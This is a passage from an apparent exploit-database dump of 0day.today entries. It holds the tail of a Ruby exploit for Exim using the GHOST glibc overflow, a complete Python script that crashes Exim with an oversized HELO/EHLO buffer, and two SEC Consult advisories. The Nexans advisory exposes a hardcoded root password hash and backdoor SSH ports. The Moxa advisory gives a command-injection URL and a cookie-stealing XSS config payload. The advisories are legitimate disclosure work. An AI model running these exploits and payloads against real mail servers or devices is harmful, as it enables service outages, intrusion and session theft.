notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n \r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small malloc()s)\r\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n \r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n \r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n \r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n \r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n \r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n \r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250, 'Reset OK')\r\n end\r\n \r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n \r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n \r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n \r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n \r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n \r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n command = command[num_sent..-1]\r\n end\r\n \r\n @smtp_state = :recv\r\n end\r\n \r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n \r\n failure = catch(:failure) do\r\n \r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n \r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n \r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n \r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n \r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n \r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\r\n \r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n \r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n \r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n \r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n \r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/23392", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-01T20:59:43", "description": "Exim ESTMP denial of service exploit that leverages the GHOST glibc gethostbyname buffer overflow.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "zdt", "title": "Exim ESMTP GHOST Denial Of Service Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-29T00:00:00", "id": "1337DAY-ID-23215", "href": "https://0day.today/exploit/description/23215", "sourceData": "The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv)\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/23215", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-03-14T00:47:42", "description": "Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T00:00:00", "type": "zdt", "title": "Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-7547", "CVE-2015-9261", "CVE-2017-16544", "CVE-2022-32985"], "modified": "2022-06-21T00:00:00", "id": "1337DAY-ID-37806", "href": "https://0day.today/exploit/description/37806", "sourceData": "=======================================================================\n title: Hardcoded Backdoor User and Outdated Software Components\n product: Nexans FTTO GigaSwitch industrial/office switches HW version 5\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: V6.02N, V7.02\n CVE number: CVE-2022-32985\n impact: High\n homepage: https://www.nexans.com/\n found: 2020-05-25\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a global player in the cable industry, Nexans is behind the scenes\ndelivering the innovative services and resilient products that carry thousands\nof watts of energy and terabytes of data per second around the world. Millions\nof homes, cities, businesses are powered every day by Nexans\u2019 high-quality\nsustainable cabling solutions. We help our customers meet the challenges they\nface in the fields of energy infrastructure, energy resources, transport,\nbuildings, telecom and data, providing them with solutions and services for the\nmost complex cable applications in the most demanding environments.\"\n\nSource: https://www.nexans.com/company/What-we-do.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Outdated Vulnerable Software Components\nA static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that\nare used in the devices' firmware. Four of them were verified by using the\nMEDUSA scalable firmware runtime.\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nA hardcoded root user was found in \"/etc/passwd\". In combination with the\ninvoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port\n50201 and 50200 to login on a system shell.\n\n\nProof of concept:\n-----------------\n1) Outdated Vulnerable Software Components\nBased on an automated scan with the IoT Inspector (ONEKEY) the following third party\nsoftware packages were found to be outdated:\n\nFirmware version 6.02L:\nBusyBox 1.20.2\nDropbear SSH 2012.55\nGNU glibc 2.17\nlighttpd 1.4.48\nOpenSSL 1.0.2h\n\nThe following CVEs were verified with MEDUSA scalable firmware emulation:\n\n* CVE-2015-9261 (Unzip)\nThe crafted ZIP archive \"x_6170921383890712452.bin\" was taken from:\nhttps://www.openwall.com/lists/oss-security/2015/10/25/3\nExecution inside the firmware emulation:\n\nbash-4.2# unzip x_6170921383890712452.bin\nArchive: x_6170921383890712452.bin\n inflating: ]3j\u00bdr\u00abIK-%Ix\ndo_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc\nepc = 0044bb28 in busybox[400000+99000]\nra = 0044b968 in busybox[400000+99000]\nSegmentation fault\n\n\n* CVE-2015-0235 (gethostbyname \"GHOST\" buffer overflow)\n\nPoC code was taken from:\nhttps://gist.github.com/dweinstein/66e6a088191ac0e8105c\n\n\n* CVE-2015-7547 (getaddrinfo buffer overflow)\n\nPoC code was taken from:\nhttps://github.com/fjserna/CVE-2015-7547\n\n-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &\n[1] 259\n-bash-4.4# chroot /medusa_rootfs/ bin/bash\nbash-4.2# cd /medusa_exploits/\nbash-4.2# ./cve-2015-7547_glibc_getaddrinfo\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nConnected with 127.0.0.1:34356\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\n[TCP] Request2 len recv 36\nSegmentation fault\n\n\n* CVE-2017-16544 (shell autocompletion vulnerability)\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n]55;test.txt\n#\n-------------------------------------------------------------------------------\n\n\n2) Hardcoded Backdoor User (CVE-2022-32985)\nThe hardcoded system user, reachable via the dropbear SSH daemon was found due\nto multiple indications on the system. The undocumented root user itself was\ncontained in the \"passwd\" file:\n\nContent of the file \"/etc/passwd\".\n-------------------------------------------------------------------------------\nroot:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh\n[...]\n-------------------------------------------------------------------------------\n\nA suspicious port for the SSH daemon was chosen in the config file of dropbear:\n\nContent of the file \"/etc/init.d/dropbear\":\n-------------------------------------------------------------------------------\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nDAEMON=/usr/sbin/dropbear\nNAME=dropbear\nDESC=\"Dropbear SSH server\"\nPIDFILE=/var/run/dropbear.pid\n\nDROPBEAR_PORT=\"50200 -p 50201\"\n[...]\n-------------------------------------------------------------------------------\n\nThis is invoked from \"/usr/lib/libnx_apl.so.0.0.0\", which can be seen in the\nfollowing pseudo-code:\n-------------------------------------------------------------------------------\nvoid dropbear_server_init(char param_1)\n\n{\n __pid_t __pid;\n char *pcVar1;\n int aiStack16 [2];\n\n __pid = fork();\n if (__pid == 0) {\n __pid = fork();\n if (__pid != 0) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n if (param_1 == '\\0') {\n pcVar1 = \"/etc/init.d/dropbear stop\";\n }\n else {\n pcVar1 = \"/etc/init.d/dropbear start\"; <---\n }\n execl(\"/bin/sh\",\"sh\",&DAT_2cd91564,pcVar1,0);\n }\n else {\n waitpid(__pid,aiStack16,0);\n }\n return;\n}\n-------------------------------------------------------------------------------\n\n\nThis function is called if a specific command is issued in the CLI interface:\n-------------------------------------------------------------------------------\n[...]\n iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),\"ssh\",2);\n if (iVar6 != 0) {\n if (param_2 < 4) {\n netbuf_fwd_sprintf(param_1,\"\\r\\n%%Error: Parameter missing\\r\\n\");\n iVar6 = shared_mem_get_addr(&var_shm);\n iVar7 = shared_mem_get_addr(&var_shm);\n uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);\n shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"start\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\x01'); <---\n netbuf_fwd_sprintf(param_1,\"Starting dropbear...\\r\\n\");\n return;\n }\n iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),\"stop\",1);\n if (iVar6 != 0) {\n dropbear_server_init('\\0'); <---\n netbuf_fwd_sprintf(param_1,\"Stopping dropbear...\\r\\n\");\n return;\n }\n netbuf_fwd_sprintf(param_1,\"Uknown dropbear command...\\r\\n\");\n return;\n[...]\n-------------------------------------------------------------------------------\nThe mentioned library is used in the CLI program that is running on the device.\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions have been tested:\n\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L\n* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M\n\n\nVendor contact timeline:\n------------------------\n2020-05-28: Contacting the vendor's PSIRT under the following link:\n http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail\n No answer.\n2020-06-08: Contacting vendor again via [email\u00a0protected] Extended\n deadline by 11 days.\n2020-06-16: Telephone call with Nexans representative. Security advisory was\n received. It will be reviewed to confirm the found issues.\n2020-06-26: Telephone call with Nexans representative. Nexans is working on the\n reported issues and will remove the dropbear daemon as first\n measure.\n2020-08-04: Vendor stated that a fix for the outdated software components will\n be available in November.\n2020-11-12: Asked for status update.\n2020-11-16: Contact stated, that firmware test will need more time. Updates are\n estimated to be ready in Q1 of 2020.\n2020-11-20: Vendor confirmed Q1 as estimated disclosure date.\n2021-01-21: Asked for status update; Vendor stated that the release with all\n fixes is aimed to be published end of Q1.\n2021-03-09: Asked for status update.\n2021-03-17: Vendor stated that the firmware is in testing stage. The fixed\n firmware will be released in May.\n2021-06-10: Asked for status update.\n2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and\n homeschooling. The fixed firmware will be released end of August.\n2021-08-31: Asked for status update.\n2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.\n2022-05-23: Informed vendor that the advisory will be released mid of June 2022.\n2022-05-24: Firmware V7.02 is available for download which fixes most outdated\n components issues.\n2022-06-15: Release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides an updated firmware here:\nhttps://www.nexans-ans.de/support/firmware/\n\nFirmware version V6.02N has the backdoor removed and was already published a while ago.\nVersion V7.02 also has the backdoor removed and most of the outdated software issues.\n", "sourceHref": "https://0day.today/exploit/37806", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T04:23:08", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Moxa Command Injection / Cross Site Scripting Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1914", "CVE-2013-7423", "CVE-2015-0235", "CVE-2015-7547", "CVE-2016-1234", "CVE-2021-39278", "CVE-2021-39279"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36699", "href": "https://0day.today/exploit/description/36699", "sourceData": "=======================================================================\n title: Multiple vulnerabilities\n product: see \"Vulnerable / tested versions\"\n vulnerable version: see \"Vulnerable / tested versions\"\n fixed version: see \"Solution\"\n CVE number: CVE-2021-39278, CVE-2021-39279\n impact: High\n homepage: https://www.moxa.com/\n found: 2020-08-31\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"Together, We Create Change\n\nMoxa is committed to making a positive impact around the world. We put our all\nbehind this commitment--from our employees, to our products and supply chain.\n\nIn our local communities, we nurture and support the spirit of volunteering.\nWe encourage our employees to contribute to community development, with an\nemphasis on ecology, education, and health.\n\nIn our products, we invest in social awareness programs and\nenvironment-friendly policies at every stage of the product lifecycle. We make\nsure our manufacturing meets the highest standards with regards to quality,\nethics, and sustainability.\"\n\nSource: https://www.moxa.com/en/about-us/corporate-responsibility\n\nBusiness recommendation:\n------------------------\nSEC Consult recommends to immediately apply the available patches\nfrom the vendor. A thorough security review should be performed by\nsecurity professionals to identify further potential security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Command Injection (CVE-2021-39279)\nAn authenticated command injection vulnerability can be triggered by issuing a\nGET request to the \"/forms/web_importTFTP\" CGI program which is available on\nthe web interface. An attacker can abuse this vulnerability to compromise the\noperating system of the device. This issue was found by emulating the firmware\nof the device.\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nVia a crafted config-file, a reflected cross-site scripting vulnerability can\nbe exploited in the context of the victim's browser. This config-file can be\nuploaded to the device via the \"Config Import Export\" tab in the main menu.\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nThe used GNU glibc in version 2.9 is outdated and contains multiple known\nvulnerabilities. One of the discovered vulnerabilities (CVE-2015-0235,\ngethostbyname \"GHOST\" buffer overflow) was verified by using the MEDUSA\nscalable firmware runtime.\n\n4) Multiple Outdated Software Components\nMultiple outdated software components containing vulnerabilities were found by\nthe IoT Inspector.\n\nThe vulnerabilities 1), 2) and 3) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nProof of concept:\n-----------------\n1) Authenticated Command Injection (CVE-2021-39279)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"TFTP Import\" menu is prone to command injection via all parameters. To\nexploit the vulnerability, an IP address, a configuration path and a filename\nmust be set.\nIf the filename is used to trigger the exploit, the payload in the interceptor\nproxy would be:\n\nhttp://192.168.1.1/forms/web_importTFTP?servIP=192.168.1.1&configPath=/&fileName=name|`ping localhost -c 100`\n\n\n2) Reflected Cross-Site Scripting via Manipulated Config-File (CVE-2021-39278)\nThe vulnerability can be triggered by navigating in the web interface to the\ntab:\n\n\"Main Menu\"->\"Maintenance\"->\"Config Import Export\"\n\nThe \"Config Import\" menu is prone to reflected cross-site scripting via the\nupload of config files. Example of malicious config file:\n-------------------------------------------------------------------------------\n[board]\ndeviceName=\"WAC-2004_0000</span><script>alert(document.cookie)</script>\"\ndeviceLocation=\"\"\n[..]\n-------------------------------------------------------------------------------\nUploading such a crafted file triggers cross-site scripting as the erroneous\nvalue is displayed without filtering characters.\n\n\n3) Known GNU glibc Vulnerabilities (CVE-2015-0235)\nGNU glibc version 2.9 contains multiple CVEs like:\nCVE-2016-1234, CVE-2015-7547, CVE-2013-7423, CVE-2013-1914, and more.\n\nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the\nhelp of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was\ncompiled and executed on the emulated device to test the system.\n\n\n4) Multiple Outdated Software Components\nThe IoT Inspector recognized multiple outdated software components with known\nvulnerabilities:\n\nBusyBox 1.18.5 06/2011\nDropbear SSH 2011.54 11/2011\nGNU glibc 2.9 02/2009\nLinux Kernel 2.6.27 10/2008\nOpenSSL 0.9.7g 04/2005\nOnly found in the program \"iw_director\"\nOpenSSL 1.0.0 03/2010\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following firmware versions for various devices have been identified\nto be vulnerable:\n* WAC-2004 / 1.7\n* WAC-1001 / 2.1\n* WAC-1001-T / 2.1\n* OnCell G3470A-LTE-EU / 1.7\n* OnCell G3470A-LTE-EU-T / 1.7\n* TAP-323-EU-CT-T / 1.3\n* TAP-323-US-CT-T / 1.3\n* TAP-323-JP-CT-T / 1.3\n* WDR-3124A-EU / 2.3\n* WDR-3124A-EU-T / 2.3\n* WDR-3124A-US / 2.3\n* WDR-3124A-US-T / 2.3\n\n\nVendor contact timeline:\n------------------------\n2020-10-09: Contacting vendor through [email\u00a0protected]\n2020-10-12: Contact sends PGP key for encrypted communication and asks for the\n detailed advisory. Sent encrypted advisory to vendor.\n2020-11-06: Status update from vendor regarding technical analysis. Vendor\n requested more time for fixing the vulnerabilities as more products\n are affected.\n2020-11-09: Granted more time for fixing to vendor.\n2020-11-10: Vendor asked for next steps regarding the advisory publication.\n2020-11-11: Asked vendor for an estimation when a public disclosure is possible.\n2020-11-16: Vendor responded that the product team can give a rough feedback.\n2020-11-25: Asked for a status update.\n2020-11-25: Vendor responded that the investigation is not done yet.\n2020-12-14: Vendor provided a list of potential affected devices and stated\n that full investigation may take until January 2021 due to the list\n of CVEs that were provided with the appended IoT Inspector report.\n The patches may be available until June 2021.\n2020-12-15: Shifted next status update round with vendor on May 2021.\n2020-12-23: Vendor provided full list of affected devices.\n2021-02-05: Vendor sieved out the found issues from 4) manually and provided a\n full list of confirmed vulnerabilities. WAC-2004 phased-out in\n 2019.\n2021-02-21: Confirmed receive of vulnerabilities, next status update in May\n 2021.\n2021-06-10: Asking for an update.\n2021-06-15: Vendor stated, that the update will be provided in the next days.\n2021-06-21: Vendor will give an update in the next week as Covid gets worse in\n Taiwan.\n2021-06-23: Vendor stated, that patches are under development. Vendor needs more\n time to finish the patches.\n2021-06-24: Set release date to 2021-09-01.\n2021-07-02: Vendor provides status updates.\n2021-08-16: Vendor provides status updates.\n2021-08-17: Vendor asks for CVE IDs and stated, that WDR-3124A has phased-out.\n2021-08-20: Sent assigned CVE-IDs to vendor. Asked for fixed version numbers.\n2021-08-31: Vendor provides fixed firmware version numbers and the advisory\n links.\n2021-09-01: Coordinated release of security advisory.\n\nSolution:\n---------\nAccording to the vendor the following patches must be applied to fix issues:\n* WAC-1001 / 2.1.5\n* WAC-1001-T / 2.1.5\n* OnCell G3470A-LTE-EU / 1.7.4\n* OnCell G3470A-LTE-EU-T / 1.7.4\n* TAP-323-EU-CT-T / 1.8.1\n* TAP-323-US-CT-T / 1.8.1\n* TAP-323-JP-CT-T / 1.8.1\n\nThe Moxa Technical Support must be contacted for requesting the security\npatches.\n\nThe corresponding security advisories for the affected devices are available on\nthe vendor's website:\nTAP-323/WAC-1001/WAC-2004\nhttps://www.moxa.com/en/support/product-support/security-advisory/tap-323-wac-1001-2004-wireless-ap-bridge-client-vulnerabilities\nOnCell G3470A-LTE/WDR-3124A\nhttps://www.moxa.com/en/support/product-support/security-advisory/oncell-g3470a-wdr-3124a-cellular-gateways-router-vulnerabilities\n\nThe following device models are EOL and should be replaced:\n* WAC-2004\n* WDR-3124A-EU\n* WDR-3124A-EU-T\n* WDR-3124A-US\n* WDR-3124A-US-T\n", "sourceHref": "https://0day.today/exploit/36699", "cvss": {"score": 10.0, 